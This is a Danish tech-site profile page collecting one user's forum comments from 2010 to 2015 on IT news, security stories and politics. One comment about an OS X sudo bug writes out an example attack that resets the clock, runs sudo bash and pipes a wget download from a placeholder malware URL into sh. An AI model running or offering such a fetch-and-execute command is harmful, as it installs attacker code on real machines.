Dennis Rilorin

Terrorister som os - og kryptering

Om noget burde vi stoppe med at deltage i militære aktioner og smide nødhjælp i stedet for bomber.</p>
<p>I det lange løb vil "de" synes bedre om "os", hvis vi nægter kategorisk at deltage i krig i Mellemøsten, men kun i nødhjælp og opbygning af stabile nationer.

Der synes jeg du rammer hovedet på sømmet. Lige så snart vesten tager side i konflikter, vil der være nogle der bliver "trådt over tærene". Hvis man træder tilpads hårdt, vil dette næsten altid provokere en modreaktion!

18. november 2015 kl. 12:10
Red Alert! Eller: Skift mit batteri, humaaan - klokken 03:30

Herligt indlæg med mange gode og valide pointer :)

13. november 2015 kl. 11:12
Stor stigning i hackerangreb mod forældet protokol

Vil mene at det det er op til den enkelte virksomhed, at sikre de sårbare porte er lukkede. Har virksomheden ikke taget de nødvendige tiltag, er det bare ris til egen ***.

Det er ikke kun ris til kundens egen ***, men også til udbyderens, når en kundes usikre Exchange server bliver brugt til at distribuere spam til internettet.

Kundens /30 netsegment er stadig "ejet" af udbyderen og når kundens ip-segment bliver tilmeldt diverse Real-time Blackhole List'er giver det problemer for udbyderen og eventuelle naboer i samme C klasse.

27. marts 2015 kl. 11:30
Java var adgangsvej for 91 procent af webtruslerne

Nikolaj, jeg er basalt set enig i din holdning, men det er en hårfin grænse mellem brugervenlighed og nødvendig teknisk indsigt.

Langt størstedelen af verdensbefolkningen har ingen interesse i hvordan deres browser henter data og processerer dette og om den nuværende version af forskellige programmer lever op til de nuværende sikkerhedsniveauer. De skal bare se youtube / twitter / facebook og er ligeglade med java eller flash eller hvad det nu hedder det der tekniske gobbledigook.

17. januar 2014 kl. 12:22
Jeg flytter hjemmefra

Med mindre han bruger f.eks. ksplice :P

14. november 2013 kl. 12:16
It-chefer misser aftenens store Apple-pointe: Aner ikke, hvad iOS 7 kan

Vi må jeg huske på at Apple er et firma der gerne vil sælge nogle varer, så at deres kunder ikke aner en hujende hattefis om deres produkter kan kun være Apples problem. Til gengæld ved jeg også godt at nogle brands vokser sig så store at de har tendens til at glemme det simple fact and de altså er til FOR kunden og ikke omvendt.

12. september 2013 kl. 13:37
Apple ignorerer Unix-hul i OS X i seks måneder

(Til gengæld, hvis man er så forsigtig at klikke på hængelåsen efter at have lavet ændringer, er denne bug formentlig slet ikke mulig at benytte sig af.)

Hvis jeg ville programmere noget malware ville jeg tro at jeg ville foretrække at udføre kommandoer istedet for at "klikke" på nogetsomhelst. F.eks. ville jeg eksekvere følgende kommandoer: systemsetup -setdate 01:01:1970 sudo bash wget http://evil_script_installing_malware_or_spyware_or_both_and_leaves_it_running_in_the_background.com -O - | sh

Jeg ville nok forfine det lidt og bruge et script lokaliseret et lidt mere anonymt sted. Dette skal så gemmes ind i en serverside scripted side som bliver eksekveret i en browser på den fysiske maskine.

Disclaimer: Jeg ved ikke om det i OSX er muligt at udføre ovenstående systemsetup kommando uden sudo, eller om man SKAL igennem hængelåsikonet, da jeg ikke er Mac bruger. Dette er resultatet af 5 mins google lookups og er kun ment som et eksempel.

3. september 2013 kl. 09:37
Ny ejer af familedomæne: Urigtige oplysninger om forlig

Hvis nu fætter og kusine havde sat sig sammen, i rolig og samarbejdsvillig samtale, ville hele Danmark have været forskånet for denne pinlige sag.

31. maj 2013 kl. 12:02
Brug for billed-backup? Flickr giver 1 terabyte gratis lagerplads

None (All rights reserved) Attribution-NonCommercial-ShareAlike Creative Commons Attribution-NonCommercial Creative Commons Attribution-NonCommercial-NoDerivs Creative Commons Attribution Creative Commons Attribution-ShareAlike Creative Commons Attribution-NoDerivs Creative Commons

23. maj 2013 kl. 13:23
Forsmået it-medarbejder sprøjtede rengøringsmiddel i serverne

en lang grudge han har haft. Jeg tror nok jeg havde fundet et andet sted at arbejde hvis jeg var SÅ utilfreds.

5. februar 2013 kl. 12:20
Microsoft risikerer ny dummebøde for browser-kiks

Kan vi ikke blive enige om at forsøge at lade være med at bruge bilanalogier til at forklare IT med? Det afføder en masse ligegyldig diskussion om hvad der menes med "hjulene" eller "rattet" eller som i det her eksempel "navigationssystemet" og fjerner fokus fra det vi startede med at debatere.

Hmm, ved nærmere eftertanke er det måske det, "Debatten" på Version2 handler om, altså at debattere om hvad som helst.

Jeg tier stille og lader jer debattere :)

26. september 2012 kl. 12:30
Lønnen er reddet - Bluegarden har fået ny disk hjem

Hvis den netværksappliance er vigtig nok, har man vel en spare stående som hot / cold standby. Så kan man rekvirere sig en disk i ro og mag når driften er genoptaget.

26. september 2012 kl. 11:26
Russisk militær laver Android-konkurrent for at slippe for at sende data til Google

Det synes jeg er et udtryk der bliver brugt alt for lidt. Men jeg har heller aldrig været i militæret, det kan være det hænger sammen med det :)

4. september 2012 kl. 11:53
Videotjenesten Netflix kommer til Danmark

Er det kun ældre TV serier, altså serier der er udgivet på DVD, der er at forefindes på NetFlix? Eller er der også de helt nye aktuelle serier til rådighed?

15. august 2012 kl. 11:32
Baldur's Gate vender tilbage - Botox eller reinkarnation?

Go for the eeyes!

http://www.youtube.com/watch?v=Ozv1RcQJAHA

Jeg glæder mig ihvertfald meget til et gensyn i bedre opløsning / skarpere grafik.

19. marts 2012 kl. 11:16
Dansk kritik af IBM: Lotus Notes er begravet i dårlig omtale

Jeg tror grunden til at Mikkel skriver som han gør, er for at forklare sammenhængen. Ved at tage udgang i produkter som flest kender, kommer han klarere igennem med sit budskab.

6. januar 2012 kl. 12:24
Microsoft klar med første beta af Office 15 til januar

Jeg kan simpelthen ikke hidse mig op over nye versioner af teksbehandlingsprogrammer. Er det kun mig der sagtens kunne nøjes med en webbaseret WYSIWYG editor til min teksbehandling? Hvor mange bruger egentlig de meget avancerede features i M$ Word?

29. november 2011 kl. 12:25
Sony hacket igen: Én million passwords er stjålet

Altså, nu består Sony's netværk nok ikke af 2-3 servere med et par websites og et par access databaser på hver. En "sikkerhedsaudit på samtlige deres systemer" er helt sikkert ikke den simple og hurtigt overståede operation du her lægger op til at det skulle være.

6. juni 2011 kl. 13:28
Retro-malware: E-mail-orm skaber ravage hos Google og Nasa

Såvidt jeg kan tyde ud fra artiklen er her tale om en virus / malware der installerer en .exe-fil. Det vil naturligvis sige at det skal afvikles på en Windows-maskine for at gøre nogen skade, men jeg er af den opfattelse at Google overhovedet ikke kører Windows noget sted i deres organisation. Derfor mener jeg at Google ikke kan være ramt af virussen.

Er der nogen der kan be- eller afkræfte om Google er en 100% no-Windows-virksomhed?

10. september 2010 kl. 13:49